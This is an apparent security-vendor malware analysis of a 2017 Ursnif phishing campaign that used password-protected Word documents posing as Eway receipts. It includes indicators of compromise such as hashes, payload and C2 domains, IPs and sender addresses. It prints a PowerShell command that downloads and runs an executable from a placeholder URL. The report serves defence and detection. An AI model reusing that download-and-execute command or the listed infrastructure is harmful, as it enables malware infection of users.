Wave of Ursnif Variants Leveraging Password-Protected Documents Continues to Spread Worldwide

Apr 7, 2017

We are experiencing a surge of attacks, across the globe, by the banking and spyware family Ursnif. As recently described in the blog My Online Security, the attackers send phishing emails pretending to originate from the Australian online payment company Eway. This campaign dates back to mid-February, at the latest, having compromised victims in North America, Western Europe, Australia and Japan.

The emails contain a password protected Word document (docx). The password is found in the content of the email, which encourages the victim to open the document using the password. Since the original document attached is password protected, it evades detection by AV, anti-malware or sandboxing solutions. The sender, subject and content of the emails are all highly similar: the email is sent from an address in the newly registered domain ewaystore.info, the subject updates on the receipt of an approved order or purchase. Here is an example of one of the emails’ content:

Figure 1 – the content of the email

Once opened, the Word document displays pictures of PDF and EXCEL icons (supposedly containing a receipt) and upon clicking, invokes a PowerShell command that downloads and runs a malicious executable:

%ComSpec% /C PowerShell (New-Object System.Net.WebClient). DownloadFile (‘http://%URL_CONTAINING_PAYLOD%’,’%FILE_NAME%’);Start-Process ‘%FILE_NAME%’

In most of the cases that we have observed, the executable downloaded by PowerShell has the file name “flash.exe” or “player.exe” and carries a flash player icon. Once run, this executable enumerates a long list of registry keys and collects information about the target. The information gathered is meant to assist in evasion, set the ground for persistency and stealth, as well as provide the initial reconnaissance about the target. The malware collects the OS version, product ID, installation date, registers as a top-level exception handler (classic anti-debugging technique), modifies proxy settings, checks for existing Outlook and Windows Live Mail accounts, installed programs, and collects browser history and cache. The information gathered is written as randomly named files in the following location: %users\%user%\AppData\Local\Temp\%file_name%.
The files are deleted after being posted by HTTP post requests on one of the many possible C2 servers.

Figure 2 – a data file created and deleted after posting to the C2 server

Figure 2 – a data file created and deleted after posting to the C2 server

Communication with the C2 servers is done is SSL:

Figure 3 – DNS requests for a C2 server followed by an SSL handshake

Figure 3 – DNS requests for a C2 server followed by an SSL handshake

At this point, a second stage payload is dropped. Some variants will drop the additional executable or DLL after decrypting a section in the original PE and others will download it from a C2 server. In any case, once the second stage payload is loaded, code will be injected to explorer.exe and execution will continue from there:

Figure 4 – DLL dropped and loaded (sha256 716efba2287317a2c7a68947f966e7e6cbae1326cfa217873520330b0f7beb15)

An examination of the associated URLs and IP addresses revealed several interesting details. The infrastructure uses separate sets of IP addresses and URLs for dropping the payload (directed to by the PowerShell script) and for communication while the malware runs. The PowerShell directs to several .au domain names. However, they are all resolved to three IP addresses located in the US. The C2s used for communication in runtime seem to vary considerably between different variants. Different variants use different IP addresses and domain names, and the change seems to be consistent with the time different variants that surfaced at. Almost all IP addresses originate from Eastern Europe, predominantly the Ukraine, as well as Romania and Germany. The continuing change in C2’s IP and location is most likely an effort on the attackers’ side to make the infrastructure more difficult to trace. Deep Instinct’s research team has been successful in expanding the number of known IOC’s associated with this campaign.

It seems that Ursnif has come back on the scene, as we are witnessing several active phishing campaigns that are spreading Ursnif variants. A separate campaign spotted recently also uses password protected documents as the initial dropper. In this related campaign, the documents embedded in the initial password-protected dropper, invoke a malicious VBScript which will drop, decrypt and run the payload.

Other than the .docx files, which evade detection, most payloads are not detected by the majority of security solutions for several days after they have appeared in the wild, leaving the door open to attackers to compromise many victims. Deep Instinct’s solution accurately detects all associated payloads by leveraging its strong, deep learning based capabilities to identify new, unseen malware.

IoC:

Droppers (doc files) SHA-256

a772dfd01974a5fb25c04e2e9e83c81d46b9cbbc8dcb61840fe18d4d5ff87537
fd15ad5bf8e2e5ade06174628b3efcb7e34d595e6341e2cdeaef6862f37c58b7
9b3f1089ab4c89595f6514824ae4b2d14fce2819d50dd0518029a77e8c350d17
efb9229b7f0b925d06c0b0c15ee71d7febe8efbd1effa9b5efdaf38648a824c1
db381444fb075d6804b8de7193865405a0875c854df33d41b801d13411327282

Addresses used for serving payload
URLs

resilienceconsulting.com.au westonsocialgolfclub.com
windsorpc.com.au earlychildhoodconsulting.com.au
masterconstructions.com.au kwazii.com.au
dllfiles.org/dllfiles

IP Addresses

192.185.162.71
192.185.162.104
192.185.162.105


Malicious Payloads (PE)

2fb0587a1f21a41b8827be8181dbdf03279fc4bf476e8096215a5d9480ac7b58
c152be1b85cae357a3b2741d9d80c491f32b99bc27ae6bf47cc17c51109c9868
0df4cfb1e651c37d43d7f5215c3cab2024aa7c481d4e0bb4213b52c0306c3ee2
b6f7f4f6cb66ce5c69b81e59a4ecafbcf18ddb3a9abe49bb392dcf305ce0bd33
3f7daa1fcc73d85ecd260da17832440f10202854f11db18c7b98505bfe3d98ee
b00db4dd8f576c579abb72d6d6da5fc797f025accbf60571207b00244e6e5a3b
d1b637fab01fa4e5a3aae1e26fd1c1dbe9c376840c552019d876e97e17caf69d
c152be1b85cae357a3b2741d9d80c491f32b99bc27ae6bf47cc17c51109c9868
65a1d9024b198adf6cda9a9ff11aa51dd63aa31abb6b43353b3b943a5e5886fa
62f99defe2d8febfe03c27fefb5a84cf34519a8f9299cba840414dfb50897071
aafef22d14b266bd16658a0e687c4f582b83fcf63edcdee729f1449849a7997d
ca4766c22c4d58cee6c428ac0c23e882e2927a7bef1a9661cb175a4d1de9a7f9
c946c1dbf24c151632cc7955d816dd85b34038261a79f271c9469a29adbb7da4
e6cef31d573eb1d167a53ca06d6542d4f5257b83931c2ebd3de13f2fda526b3e
86045aa64d63dc9269223fa05cd12e4dad1878eb85e891bf2615c319e60e4c66
4784d6570eaadc350aed2a3d00dd258b93bec36f649965f3f9fb725cf63b43ff
3e1d4455fe60b58b4cc9e7b6683cbfd1a6b889561fc0f463b97f01cbb0194191
e843eded3d68d3c2741aea33092a4b25c07a2ffd8dd9beaa317f7487cb0e0420
8c3bf7b282a6772387d839063ecdb2adb0f5df7debf2d6adf68d0c69f891f9ba
716efba2287317a2c7a68947f966e7e6cbae1326cfa217873520330b0f7beb15
dec0a801af2a6080425d710aaa073ba449c5056659690f9113af2273a576f045

C2 servers

URLs

mediacontent.ltd forfundamapplithtsuthe.ru
0001krasemia.com geroyamslava.at
groupcreatedt.at sourcethwicoccu.ru
fileservers.at foradvisedcalthephpgiven.ru
blackcoffee.bit provthisgroupgr.ru
programuserandussource.ru createdpteamrights.ru
belowscamarksaccyouwith.ru follthethatforunderthe.ru
teththethelicense.ru

IP Addresses

82.117.253.173 178.94.153.9 176.126.176.230
213.159.253.8 176.215.55.189 93.113.176.105
194.58.184.253 46.185.113.17 208.67.222.222
89.185.21.82 185.13.243.181 176.38.10.47
93.79.68.247 80.71.240.164 144.76.133.38
176.112.7.100 77.122.168.109 31.6.98.151
46.150.72.96 77.123.218.185 178.137.127.178
46.185.63.7 5.166.251.172 87.106.18.141
31.133.67.199 121.182.77.149 91.222.168.221
37.115.40.38 93.79.6.249 80.71.240.164
90.154.133.176 188.190.195.205 46.63.22.22
195.72.156.234 86.126.76.162 77.123.218.185
213.227.201.28 93.78.190.202 46.119.164.24
46.250.17.10 178.215.190.133 86.106.86.211
90.154.133.176 178.137.244.110 94.158.204.95

Associated Email addresses
customer@ewaystore[.]info
helpandcare@ewaystore[.]info